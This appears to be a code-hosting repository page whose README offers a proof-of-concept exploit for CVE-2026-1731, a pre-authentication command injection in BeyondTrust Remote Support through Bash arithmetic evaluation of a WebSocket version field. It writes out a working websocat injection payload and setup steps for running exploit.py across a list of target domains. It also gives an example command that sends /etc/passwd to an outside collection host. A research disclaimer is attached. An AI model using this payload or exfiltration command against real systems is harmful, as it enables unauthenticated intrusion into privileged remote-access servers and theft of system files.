michael.reber/CVE-2026-1731
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
4 Commits 1 Branch 0 Tags
main
Go to file
Clone
Open with VS Code Open with VSCodium Open with Intellij IDEA
Download ZIP Download TAR.GZ Download BUNDLE
Bipin Jitiya b2cff2b6f3 Timeout added 
Timeout added
2026-02-11 18:16:14 +05:30
DISCLAIMER.md
Create DISCLAIMER.md
2026-02-11 15:13:36 +05:30
exploit.py
Timeout added
2026-02-11 18:16:14 +05:30
README.md
Create README.md
2026-02-11 15:11:13 +05:30

README.md

CVE-2026-1731 BeyondTrust Remote Support Pre-Auth RCE PoC

Warning

This script is intended for educational and research purposes only. Do not use it against systems without explicit permission. Unauthorized access or testing is illegal and unethical. Read the full DISCLAIMER before using this script.

Overview

This script demonstrates a critical command injection vulnerability (CVE-2026-1731) affecting BeyondTrust Remote Support (RS) and Privileged Remote Access (PRA). The issue originates from the same WebSocket-reachable endpoint involved in the earlier high-profile CVE-2024-12356, making this a closely related variant.

The vulnerability exists because the server's thin-scc-wrapper script performs arithmetic comparisons on attacker-controlled input, specifically the remoteVersion value sent during the WebSocket handshake. Bash treats operands in numeric comparisons as expressions, not plain strings, which allows crafted payloads like a[$(cmd)]0 to trigger arbitrary command execution during evaluation.

Even though BeyondTrust added a numeric sanity check in this patch cycle, it does not prevent Bash from performing expression evaluation later, leaving the endpoint exploitable. Attackers can gain code execution simply by opening a WebSocket connection and sending a malicious version value before authentication.

Payload

echo -ne "hax[\$(ATTACKER-COMMAND)]\naaaaaaaa-aaaa-aaaa-aaaaaaaaaaaa\n0\naaaa\n" | \
./websocat -k wss://AFFECTED-SYSTEM:443/nw \
--protocol "ingredi support desk customer thin" \
-H "X-Ns-Company: COMPANY-NAME" \
--binary -n -

Dependencies

pip3 install requests

Download websocat

wget -O websocat https://github.com/vi/websocat/releases/download/v1.14.1/websocat.x86_64-unknown-linux-musl
chmod +x websocat

(Place it in the same folder as your Python script.)

Or move it system-wide:

sudo mv websocat /usr/local/bin/

Create domains.txt in the same directory

Add the URLs you want to test:

example1.com
example2.com
example3.com

Script Usage

Edit the following line in the script to configure the command you want the WebSocket exploit to execute:

CMD = "YOUR-COMMAND-HERE"

For example:

CMD = "curl -X POST -d @/etc/passwd http://XXXXXXXXX.oast.fun/"

Once the command is set, run the script:

python3 exploit.py

Or make it executable and run it directly:

chmod +x exploit.py
./exploit.py
1 2

Mitigation

Reference

Reference in New Issue View Git Blame Copy Permalink
Description
CVE-2026-1731 - Critical command injection vulnerability in BeyondTrust Remote Support and Privileged Remote Access due to unsafe Bash arithmetic evaluation in a WebSocket-reachable script
beyondtrustcve-2026-1731remote-accessvulnerability-detection
Readme 33 KiB
Languages
Python 100%